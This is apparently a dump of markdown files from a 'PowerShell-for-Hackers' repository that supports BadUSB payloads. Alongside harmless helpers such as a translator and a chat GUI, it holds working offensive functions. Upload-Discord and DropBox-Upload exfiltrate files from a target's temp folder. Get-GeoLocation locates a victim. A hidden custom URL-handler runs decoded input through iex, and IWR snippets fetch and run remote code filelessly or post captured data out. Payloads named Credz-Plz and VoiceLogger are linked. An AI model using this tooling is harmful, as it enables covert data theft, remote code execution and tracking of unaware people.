API to provide insights into errors that occur in a PowerShell script. 28 | 29 | It takes the last error record and uses it to generate a detailed summary of the error and offer a potential PowerShell solution. 30 | 31 | The function is invoked by typing "Invoke-AIErrorHelper" or "ieh" into the PowerShell command line. 32 | 33 | If no error has occurred, the function will output a message saying "No error has occurred". 34 | 35 | ```powershell 36 | # Invoke-AIErrorHelper is a function that uses the OpenAI GPT-3 API to provide insights into errors that occur in a powershell script. 37 | 38 | Invoke-AIErrorHelper 39 | ``` 40 | 41 | --- 42 | 43 | # Generating Dalle Image 44 | 45 | This is a PowerShell function that uses the OpenAI API to generate an image based on a description. 46 | 47 | It takes two parameters, Description and Size, and an optional switch parameter, Raw, which will return the raw response from the API if set. 48 | 49 | It also takes an optional switch parameter, NoProgress, which will hide the write-progress if set. 50 | 51 | The function will convert the description to a JSON object and send it to the OpenAI API. 52 | 53 | If the Raw parameter is not set, the function will save the image to a temporary file and return the path to that file. 54 | 55 | ```powershell 56 | Get-DalleImage -Description "a cat in a rockband" 57 | ``` 58 | 59 | --- 60 | 61 | # Custom Functions 62 | 63 | ## Custom function to translate text to any language 64 | 65 | ```powershell 66 | function Invoke-AiTranslate { 67 | 68 | [CmdLetBinding()] 69 | param ( 70 | 71 | [String]$text, 72 | [String]$language, 73 | [Switch]$takeInput 74 | ) 75 | if($takeInput){ 76 | $text = Read-Host " " 77 | } 78 | $response = Get-GPT4Completion -Content "can you translate the following text to $language : $text" 79 | return $response 80 | } 81 | ``` 82 | 83 | ## Explain My Payloads 84 | 85 | ### You can use this to pull down any script from github and have it explained to you 86 | 87 | ```powershell 88 | # formatted with my shorturl for my payloads 89 | 90 | invoke-AIExplain -Value (irm jakoby.lol/voicelogger) 91 | 92 | # Same command with the URL expanded 93 | 94 | invoke-AIExplain -Value (irm https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/VoiceLogger/VL.ps1) 95 | ``` 96 | 97 | ### Ai Powered Portscan 98 | 99 | This is an example of how easy it is to do a general query and pass it off to Ai for analyzing 100 | 101 | 102 | 103 | ```powershell 104 | # Command to get all open ports 105 | 106 | $ports = Get-NetTCPConnection | Where-Object { $_.State -eq 'Established' } | Select-Object LocalPort, RemotePort | Sort-Object LocalPort, RemotePort -Unique 107 | 108 | # Example array for this demo 109 | 110 | $ports = @('22' , '53') 111 | ``` 112 | 113 | --- 114 | 115 | ```powershell 116 | # Custom function to load array of ports into custom prompt to generate a security report 117 | 118 | function Invoke-portReport ($ports){ 119 | $date = Get-Date -Format "yyyy-MM-dd" 120 | $name = $env:username 121 | $Script:portReport = Get-GPT4Completion -Content "can you generate a pentesting report inserting the $date and $name highlighting the dangers of having the following ports open: $ports" 122 | } 123 | ``` 124 | 125 | --- 126 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /Functions/txt-img.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. Syntax
    3. 9 |
  3. The Function
    4. 10 |
  4. Examples
    5. 11 |
  5. Contact
    6. 12 |
  6. Acknowledgments
    7. 13 |
14 |
15 | 16 | # Text to Image 17 | 18 |

19 | 20 | Golang 21 | 22 |
YouTube Tutorial 23 |

24 | 25 | ## Description 26 | 27 | This function will convert a text file to an image 28 | 29 | ## [SYNTAX] 30 | 31 | ### Encode an Image 32 | ``` 33 | txt-img -txtPath "C:\Users\User\Desktop\text.txt" -imgPath "C:\Users\User\Desktop\img.jpg" 34 | ``` 35 | 36 | ## The Function 37 | 38 | ### [txt-img] 39 | 40 | This function will convert your text file to an image 41 | 42 | Use the txtPath tag to provide the path of the text file you are trying to convert 43 | 44 | Using the imgPath parameter will set where the image is saved to and what it is saved as 45 | 46 | If no imgPath is designated it will save it to the desktop with the name foo.jpg by default 47 | 48 | ``` 49 | function txt-img { 50 | [CmdletBinding()] 51 | param ( 52 | 53 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 54 | [string]$txtPath, 55 | 56 | [Parameter (Mandatory = $False)] 57 | [string]$imgPath 58 | ) 59 | 60 | if (!$imgPath) {$imgPath = "$Env:USERPROFILE\Desktop\foo.jpg"} 61 | 62 | $content = [IO.File]::ReadAllText($txtPath) 63 | Add-Type -AssemblyName System.Drawing 64 | $bmp = new-object System.Drawing.Bitmap 1920,1080 65 | $font = new-object System.Drawing.Font Consolas,18 66 | $brushBg = [System.Drawing.Brushes]::White 67 | $brushFg = [System.Drawing.Brushes]::Black 68 | $graphics = [System.Drawing.Graphics]::FromImage($bmp) 69 | $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) 70 | $graphics.DrawString($content,$font,$brushFg,500,100) 71 | $graphics.Dispose() 72 | $bmp.Save($imgPath) 73 | } 74 | ``` 75 | 76 |

(back to top)

77 | 78 | 79 | ## Examples 80 | 81 | Listed below are payloads that have used one of these functions: 82 | 83 | [Wallpaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 84 | 85 |

(back to top)

86 | 87 | 88 | ## Contact 89 | 90 |

📱 My Socials 📱

91 |
92 | 93 | 94 | 100 | 106 | 112 | 118 | 119 |
95 | 96 | C# 97 | 98 |
YouTube 99 | 		101 | 102 | Python 103 | 104 |
Twitter 105 | 		107 | 108 | Golang 109 | 110 |
Instagram 111 | 		113 | 114 | Jsonnet 115 | 116 |
Discord 117 |
120 |
121 | 122 | 123 | 124 |

(back to top)

125 | 126 | 127 | ## Acknowledgments 128 | 129 | * [Hak5](https://hak5.org/) 130 | * [UberGuidoZ](https://github.com/UberGuidoZ) 131 | 132 | *** 133 | 134 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 135 | 136 |

(back to top)

137 | -------------------------------------------------------------------------------- /Functions/Discord-Upload.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Discord-Upload 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function is used to upload either text or other files to your discord via a webhook 27 | 28 | ## The Functions 29 | 30 | 31 | ### [Upload-Discord] 32 | 33 | This function is used to upload files to your discord. 34 | 35 | Just replace `$hookurl` with YOUR discord webhook 36 | 37 | Now you can use either of the `$text` or `$file` parameter or both 38 | 39 | ``` 40 | function Upload-Discord { 41 | 42 | [CmdletBinding()] 43 | param ( 44 | [parameter(Position=0,Mandatory=$False)] 45 | [string]$file, 46 | [parameter(Position=1,Mandatory=$False)] 47 | [string]$text 48 | ) 49 | 50 | $hookurl = 'YOUR-DISCORD-WEBHOOK' 51 | 52 | $Body = @{ 53 | 'username' = $env:username 54 | 'content' = $text 55 | } 56 | 57 | if (-not ([string]::IsNullOrEmpty($text))){ 58 | Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; 59 | 60 | if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} 61 | } 62 | ``` 63 | 64 | ---------------------------------------------------------------------------------------------------------------------------------- 65 | ### [Syntax] 66 | ``` 67 | Upload-Discord -file "file.txt" -text "this is a text file" 68 | 69 | or 70 | 71 | Upload-Discord -file "image.jpg" -text "this is an iamge" 72 | ``` 73 | 74 | 75 |

(back to top)

76 | 77 | 78 | ## Examples 79 | 80 | Listed below are payloads that can use one of these functions: 81 | 82 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 83 | 84 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 85 | 86 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 87 | 88 |

(back to top)

89 | 90 | 91 | ## Contact 92 | 93 |

📱 My Socials 📱

94 |
95 | 96 | 97 | 103 | 109 | 115 | 121 | 122 |
98 | 99 | C# 100 | 101 |
YouTube 102 | 		104 | 105 | Python 106 | 107 |
Twitter 108 | 		110 | 111 | Golang 112 | 113 |
Instagram 114 | 		116 | 117 | Jsonnet 118 | 119 |
Discord 120 |
123 |
124 | 125 | 126 | 127 |

(back to top)

128 | 129 | 130 | ## Acknowledgments 131 | 132 | * [Hak5](https://hak5.org/) 133 | * [UberGuidoZ](https://github.com/UberGuidoZ) 134 | 135 | *** 136 | 137 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 138 | 139 |

(back to top)

140 | -------------------------------------------------------------------------------- /Functions/Abuse-CapsLock.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Functions
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Abuse-CapsLock 16 | 17 |

18 | 19 | Python 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | These few functions will be different ways that you can take advantage of the CapsLock button 27 | 28 | ## The Functions 29 | 30 | ### [Caps-Indicator] 31 | 32 | This function is meant to serve as an indicator for stages of your scripts 33 | Using the following function will make the capslock light blink on and off the number of times the variable $num indicates 34 | The blinking will be in intervals of X amount of seconds as indicated by the $pause variable 35 | Use the following syntax: 36 | (blinks 3 times pausing for a second between each) 37 | 38 | ``` 39 | Caps-Indicator -pause 250 -blinks 3 40 | ``` 41 | 42 | ``` 43 | function Caps-Indicator { 44 | 45 | [CmdletBinding()] 46 | param ( 47 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 48 | [string]$pause, 49 | 50 | [Parameter (Mandatory = $True)] 51 | [int]$blinks 52 | ) 53 | 54 | $o=New-Object -ComObject WScript.Shell 55 | for($i = 1; $i -le $blinks * 2; $i++) { 56 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Milliseconds $pause 57 | } 58 | } 59 | ``` 60 | 61 | ### [Caps-Off] 62 | 63 | This function will make sure capslock is turned back off if one of your other scripts leaves it one 64 | 65 | ``` 66 | function Caps-Off { 67 | Add-Type -AssemblyName System.Windows.Forms 68 | $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') 69 | 70 | #If true, toggle CapsLock key, to ensure that the script doesn't fail 71 | if ($caps -eq $true){ 72 | 73 | $key = New-Object -ComObject WScript.Shell 74 | $key.SendKeys('{CapsLock}') 75 | } 76 | } 77 | ``` 78 | 79 |

(back to top)

80 | 81 | 82 | ## Examples 83 | 84 | Listed below are payloads that have used one of these functions: 85 | 86 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 87 | 88 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 89 | 90 | 91 |

(back to top)

92 | 93 | 94 | ## Contact 95 | 96 |

📱 My Socials 📱

97 |
98 | 99 | 100 | 106 | 112 | 118 | 124 | 125 |
101 | 102 | C# 103 | 104 |
YouTube 105 | 		107 | 108 | Python 109 | 110 |
Twitter 111 | 		113 | 114 | Golang 115 | 116 |
Instagram 117 | 		119 | 120 | Jsonnet 121 | 122 |
Discord 123 |
126 |
127 | 128 | 129 | 130 |

(back to top)

131 | 132 | 133 | ## Acknowledgments 134 | 135 | * [Hak5](https://hak5.org/) 136 | * [UberGuidoZ](https://github.com/UberGuidoZ) 137 | 138 | *** 139 | 140 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 141 | 142 |

(back to top)

143 | -------------------------------------------------------------------------------- /VideoNotes/psChat.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | # Load necessary assembly for Windows Forms 3 | Add-Type -AssemblyName System.Windows.Forms 4 | 5 | # Create the main form with dark background 6 | $form = New-Object System.Windows.Forms.Form 7 | $form.Text = 'Chat Room' 8 | $form.Size = New-Object System.Drawing.Size(500, 400) # Adjusted form size to accommodate buttons 9 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) 10 | $form.AutoScaleMode = 'Dpi' 11 | 12 | # Create a RichTextBox for displaying messages with dark theme 13 | $richTextBoxDisplay = New-Object System.Windows.Forms.RichTextBox 14 | $richTextBoxDisplay.Location = New-Object System.Drawing.Point(10, 10) 15 | $richTextBoxDisplay.Size = New-Object System.Drawing.Size(360, 280) 16 | $richTextBoxDisplay.Anchor = 'Top,Left,Right,Bottom' 17 | $richTextBoxDisplay.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 18 | $richTextBoxDisplay.ForeColor = [System.Drawing.Color]::WhiteSmoke 19 | $form.Controls.Add($richTextBoxDisplay) 20 | 21 | # Create a textbox for typing messages with dark theme 22 | $textBoxInput = New-Object System.Windows.Forms.TextBox 23 | $textBoxInput.Location = New-Object System.Drawing.Point(10, 300) 24 | $textBoxInput.Size = New-Object System.Drawing.Size(260, 20) 25 | $textBoxInput.Anchor = 'Bottom,Left,Right' 26 | $textBoxInput.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 27 | $textBoxInput.ForeColor = [System.Drawing.Color]::WhiteSmoke 28 | $form.Controls.Add($textBoxInput) 29 | 30 | # Create a button for sending messages with dark theme 31 | $buttonSend = New-Object System.Windows.Forms.Button 32 | $buttonSend.Location = New-Object System.Drawing.Point(280, 300) 33 | $buttonSend.Size = New-Object System.Drawing.Size(90, 20) 34 | $buttonSend.Anchor = 'Bottom,Right' 35 | $buttonSend.Text = 'Send' 36 | $buttonSend.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 37 | $buttonSend.ForeColor = [System.Drawing.Color]::WhiteSmoke 38 | $form.Controls.Add($buttonSend) 39 | 40 | # Add an event handler for the Send button 41 | $buttonSend.Add_Click({ 42 | $richTextBoxDisplay.AppendText("You: $($textBoxInput.Text)`r`n") 43 | $textBoxInput.Clear() 44 | $richTextBoxDisplay.ScrollToCaret() 45 | }) 46 | 47 | # Create a StatusStrip for the bottom of the form 48 | $statusStrip = New-Object System.Windows.Forms.StatusStrip 49 | $statusStrip.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 50 | $statusLabel1 = New-Object System.Windows.Forms.ToolStripStatusLabel 51 | $statusLabel1.Text = "Status: " 52 | $statusLabel1.ForeColor = [System.Drawing.Color]::White 53 | $statusLabel2 = New-Object System.Windows.Forms.ToolStripStatusLabel 54 | $statusLabel2.Text = "Connected ✅" 55 | $statusLabel2.ForeColor = [System.Drawing.Color]::GreenYellow 56 | $statusStrip.Items.Add($statusLabel1) 57 | $statusStrip.Items.Add($statusLabel2) 58 | $form.Controls.Add($statusStrip) 59 | 60 | # Define button properties 61 | $buttonWidth = 80 62 | $buttonHeight = 20 63 | $initialButtonTop = 10 64 | $buttonSpacing = 40 65 | 66 | # Function to create a button 67 | function Create-Button { 68 | param ($text, $top) 69 | $button = New-Object System.Windows.Forms.Button 70 | $button.Location = New-Object System.Drawing.Point(400, $top) 71 | $button.Size = New-Object System.Drawing.Size($buttonWidth, $buttonHeight) 72 | $button.Anchor = 'Top,Right' # Anchor set to Top and Right 73 | $button.Text = $text 74 | $button.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 75 | $button.ForeColor = [System.Drawing.Color]::WhiteSmoke 76 | return $button 77 | } 78 | 79 | # Create and add buttons 80 | $buttonSearch = Create-Button -text 'Search' -top $initialButtonTop 81 | $form.Controls.Add($buttonSearch) 82 | 83 | $buttonSendFile = Create-Button -text 'Send File' -top ($initialButtonTop + $buttonSpacing) 84 | $form.Controls.Add($buttonSendFile) 85 | 86 | $buttonClearChat = Create-Button -text 'Clear Chat' -top ($initialButtonTop + 2 * $buttonSpacing) 87 | $form.Controls.Add($buttonClearChat) 88 | 89 | $buttonSettings = Create-Button -text 'Settings' -top ($initialButtonTop + 3 * $buttonSpacing) 90 | $form.Controls.Add($buttonSettings) 91 | 92 | # Event handlers for buttons (placeholders for actual functionality) 93 | #$buttonSearch.Add_Click({ # Add search functionality here }) 94 | #$buttonSendFile.Add_Click({ # Add file sending functionality here }) 95 | #$buttonClearChat.Add_Click({ $richTextBoxDisplay.Clear() }) 96 | #$buttonSettings.Add_Click({ # Add settings functionality here }) 97 | 98 | # Show the form 99 | $form.ShowDialog() 100 | ``` 101 | 102 | -------------------------------------------------------------------------------- /Functions/Url-2-Ascii.md: -------------------------------------------------------------------------------- 1 | ## Extract the URI from the command-line arguments 2 | 3 | ```powershell 4 | $webURL = $args[0] 5 | ``` 6 | 7 | ## Registry Key Value 8 | ```powershell 9 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoP -Ep Bypass -File "C:\temp\myhandler.ps1" "%1" 10 | ``` 11 | 12 | ## URL ENCODING EXAMPLE 13 | ``` 14 | https://example.com/search?q=hello world&category=books?sort=asc 15 | 16 | 17 | https://example.com/search?q=hello%20world%26category=books%3Fsort=asc 18 | ``` 19 | 20 | 21 | ## Define a function to convert URL-encoded characters to their ASCII value 22 | ```powershell 23 | function Convert-UrlEncodedToAscii { 24 | param( 25 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 26 | ) 27 | 28 | # Decode the URL-encoded string to plain text 29 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 30 | 31 | # Define a regular expression to match URL-encoded characters 32 | $regex = '%([0-9a-fA-F]{2})' 33 | 34 | # Loop through all matches of URL-encoded characters and replace them with their ASCII value 35 | $asciiString = "" 36 | ([regex]$regex).Matches($decoded) | ForEach-Object { 37 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 38 | $asciiString += [char]$asciiValue 39 | } 40 | 41 | # Remove all URL-encoded characters from the decoded string 42 | $remainingString = $decoded.Replace($regex, '') 43 | 44 | # Trim the string up to the first occurrence of "//" 45 | $index = $remainingString.IndexOf("//") 46 | if ($index -ge 0) { 47 | $remainingString = $remainingString.Substring($index + 2) 48 | } 49 | 50 | # Combine the ASCII string and the remaining string 51 | $decodeOutput = $asciiString + $remainingString 52 | 53 | # Trim the last character from the string 54 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 55 | 56 | # Return the decoded and trimmed string 57 | return $decodeOutput 58 | } 59 | ``` 60 | 61 | 62 | ## Call the function to convert the URL-encoded characters in the input URL to ASCII 63 | ```powershell 64 | $fullASCII = Convert-UrlEncodedToAscii $webURL 65 | ``` 66 | 67 | ## Output the decoded and trimmed string in red text (DEBUGGING) 68 | ```powershell 69 | Write-Host $fullASCII -ForegroundColor Red 70 | ``` 71 | 72 | ## Execute a PowerShell command using the decoded and trimmed string as input 73 | ```powershell 74 | $CMD = "powershell.exe -noexit $fullASCII" 75 | $CMD | iex 76 | ``` 77 | 78 | 79 | # Full Code 80 | 81 | ```powershell 82 | # Extract the URI from the command-line arguments 83 | $webURL = $args[0] 84 | 85 | #$UrlEncodedString | clip 86 | 87 | # Define a function to convert URL-encoded characters to their ASCII value 88 | function Convert-UrlEncodedToAscii { 89 | param( 90 | [Parameter(Mandatory=$true)][string]$UrlEncodedString 91 | ) 92 | 93 | # Decode the URL-encoded string to plain text 94 | $decoded = [System.Uri]::UnescapeDataString($UrlEncodedString) 95 | 96 | # Define a regular expression to match URL-encoded characters 97 | $regex = '%([0-9a-fA-F]{2})' 98 | 99 | # Loop through all matches of URL-encoded characters and replace them with their ASCII value 100 | $asciiString = "" 101 | ([regex]$regex).Matches($decoded) | ForEach-Object { 102 | $asciiValue = [int][byte]::Parse($_.Groups[1].Value, "HexNumber") 103 | $asciiString += [char]$asciiValue 104 | } 105 | 106 | # Remove all URL-encoded characters from the decoded string 107 | $remainingString = $decoded.Replace($regex, '') 108 | 109 | # Trim the string up to the first occurrence of "//" 110 | $index = $remainingString.IndexOf("//") 111 | if ($index -ge 0) { 112 | $remainingString = $remainingString.Substring($index + 2) 113 | } 114 | 115 | # Combine the ASCII string and the remaining string 116 | $decodeOutput = $asciiString + $remainingString 117 | 118 | # Trim the last character from the string 119 | $decodeOutput = $decodeOutput.Substring(0, $decodeOutput.Length - 1) 120 | 121 | # Return the decoded and trimmed string 122 | return $decodeOutput 123 | } 124 | 125 | # Call the function to convert the URL-encoded characters in the input URL to ASCII 126 | $fullASCII = Convert-UrlEncodedToAscii $webURL 127 | 128 | # Output the decoded and trimmed string in red text 129 | Write-Host $fullASCII -ForegroundColor Red 130 | 131 | # Execute a PowerShell command using the decoded and trimmed string as input 132 | $CMD = "powershell.exe -noexit $fullASCII" 133 | $CMD | iex 134 | ``` 135 | -------------------------------------------------------------------------------- /Functions/Get-GeoLocation.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # Get-GeoLocation 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function will get the geo-location of your target 27 | 28 | ## The Function 29 | 30 | ### [Get-GeoLocation] 31 | 32 | Using the Geo-Watcher function you will get the location of your Target saved to the variable $GL 33 | 34 | Latitude and Longitude will be saved individually to the the following variables $Lat and $Lon 35 | 36 | ``` 37 | function Get-GeoLocation{ 38 | try { 39 | Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace 40 | $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object 41 | $GeoWatcher.Start() #Begin resolving current locaton 42 | 43 | while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { 44 | Start-Sleep -Milliseconds 100 #Wait for discovery. 45 | } 46 | 47 | if ($GeoWatcher.Permission -eq 'Denied'){ 48 | Write-Error 'Access Denied for Location Information' 49 | } else { 50 | $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. 51 | $GL = $GL -split " " 52 | $Lat = $GL[0].Substring(11) -replace ".$" 53 | $Lon = $GL[1].Substring(10) -replace ".$" 54 | return $Lat, $Lon 55 | 56 | 57 | } 58 | } 59 | # Write Error is just for troubleshooting 60 | catch {Write-Error "No coordinates found" 61 | return "No Coordinates found" 62 | -ErrorAction SilentlyContinue 63 | } 64 | 65 | } 66 | 67 | $Lat, $Lon = Get-GeoLocation 68 | ``` 69 | 70 | 71 | Going a step further we can use [Start-Process] to open a tab in the browser with a map of their current location 72 | 73 | by navigating to the following URL with the $Lon and $Lat variable plugged into it 74 | 75 | ``` 76 | Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon" 77 | ``` 78 | That image will look something like this: 79 | 80 | ![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-We-Found-You/location.jpg) 81 | 82 |

(back to top)

83 | 84 | 85 | ## Examples 86 | 87 | Listed below are payloads that have used one of these functions: 88 | 89 | [We-Found-You](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-We-Found-You) 90 | 91 | 92 |

(back to top)

93 | 94 | 95 | ## Contact 96 | 97 |

📱 My Socials 📱

98 |
99 | 100 | 101 | 107 | 113 | 119 | 125 | 126 |
102 | 103 | C# 104 | 105 |
YouTube 106 | 		108 | 109 | Python 110 | 111 |
Twitter 112 | 		114 | 115 | Golang 116 | 117 |
Instagram 118 | 		120 | 121 | Jsonnet 122 | 123 |
Discord 124 |
127 |
128 | 129 | 130 | 131 |

(back to top)

132 | 133 | 134 | ## Acknowledgments 135 | 136 | * [Hak5](https://hak5.org/) 137 | * [UberGuidoZ](https://github.com/UberGuidoZ) 138 | 139 | 140 |

(back to top)

141 | -------------------------------------------------------------------------------- /Functions/DropBox-Upload.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | # DropBox-Upload 16 | 17 |

18 | 19 | C# 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function is used to exfiltrate gathered data to DropBox 27 | 28 | ## The Function 29 | 30 | ### [DropBox-Upload] 31 | 32 | First off for this function to work you need to have a DropBox account. Make one [HERE](https://www.dropbox.com). 33 | 34 | Follow this [GUIDE](https://developers.dropbox.com/oauth-guide) for setting up your DropBox account for uploads 35 | 36 | Use the following syntax for your upload: 37 | 38 | ``` 39 | DropBox-Upload -FileName "file.txt" 40 | 41 | or 42 | 43 | "file.txt" | DropBox-Upload 44 | ``` 45 | 46 | Make sure to plug in your newly aquired DropBox token in the $DropBoxAccessToken variable below 47 | 48 | (this function will exfiltrate a file from your targets temp directory so make sure you save your aquired data to the same directory) 49 | 50 | ``` 51 | function DropBox-Upload { 52 | 53 | [CmdletBinding()] 54 | param ( 55 | 56 | [Parameter (Mandatory = $True, ValueFromPipeline = $True)] 57 | [Alias("f")] 58 | [string]$SourceFilePath 59 | ) 60 | $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE" # Replace with your DropBox Access Token 61 | $outputFile = Split-Path $SourceFilePath -leaf 62 | $TargetFilePath="/$outputFile" 63 | $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' 64 | $authorization = "Bearer " + $DropBoxAccessToken 65 | $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 66 | $headers.Add("Authorization", $authorization) 67 | $headers.Add("Dropbox-API-Arg", $arg) 68 | $headers.Add("Content-Type", 'application/octet-stream') 69 | Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers 70 | } 71 | ``` 72 | 73 |

(back to top)

74 | 75 | 76 | ## Examples 77 | 78 | Listed below are payloads that have used one of these functions: 79 | 80 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 81 | 82 | [ET-Phone-Home](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home) 83 | 84 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 85 | 86 |

(back to top)

87 | 88 | 89 | ## Contact 90 | 91 |

📱 My Socials 📱

92 |
93 | 94 | 95 | 101 | 107 | 113 | 119 | 120 |
96 | 97 | C# 98 | 99 |
YouTube 100 | 		102 | 103 | Python 104 | 105 |
Twitter 106 | 		108 | 109 | Golang 110 | 111 |
Instagram 112 | 		114 | 115 | Jsonnet 116 | 117 |
Discord 118 |
121 |
122 | 123 | 124 | 125 |

(back to top)

126 | 127 | 128 | ## Acknowledgments 129 | 130 | * [Hak5](https://hak5.org/) 131 | * [UberGuidoZ](https://github.com/UberGuidoZ) 132 | 133 | *** 134 | 135 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 136 | 137 |

(back to top)

138 | -------------------------------------------------------------------------------- /Functions/Invoke-WebRequest.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
    2. 8 |
  2. The Function
    3. 9 |
  3. Examples
    4. 10 |
  4. Contact
    5. 11 |
  5. Acknowledgments
    6. 12 |
13 |
14 | 15 | Appreciate [UberGuidoZ](https://github.com/UberGuidoZ) for contributing to this function. 16 | 17 | # Invoke-WebRequest 18 | 19 |

20 | 21 | Python 22 | 23 |
YouTube Tutorial 24 |

25 | 26 | ## Description 27 | 28 | These functions are used to either download or upload files or data 29 | 30 | ## The Function 31 | 32 | ### [IWR-Save] 33 | 34 | This formatting of the IWR function will download a file from a selected URL and save it to the directory of your choosing 35 | 36 | This is helpful if you are trying to save an image or sound file to use in your script 37 | 38 | ------------------------------------------------------------------------------------------------------------------------------ 39 | 40 | $env:TMP\ 41 | 42 | Use this environment variable to save the file to your Temp directory 43 | 44 | $Env:USERPROFILE\Desktop\ 45 | 46 | Use this environment variable to save a file to your desktop 47 | 48 | ``` 49 | iwr < Your url for the intended file>?dl=1 -O $Env:USERPROFILE\Desktop\image.jpg 50 | ``` 51 | 52 | ### [IWR-Fileless] 53 | 54 | This formatting of the IWR function will download a file and execute it immedietely without saving it to memory 55 | 56 | This is helpful if you are trying to download and execute a script without keeping it on the target's system 57 | 58 | ``` 59 | $pl = iwr < Your url for the intended file>?dl=1; invoke-expression $pl 60 | ``` 61 | 62 | ### [IWR-Post] 63 | 64 | This formatting of the IWR function will exfiltrate data via a DNS/POST 65 | 66 | This is helpful if you are trying to exfiltrate the data you have captured 67 | 68 | [Request Catcher](https://requestcatcher.com/)<-------Helpful website to test POST requests 69 | 70 | ``` 71 | iwr -Uri < Your url for posting the intended data> -Method POST -Body "text to upload" 72 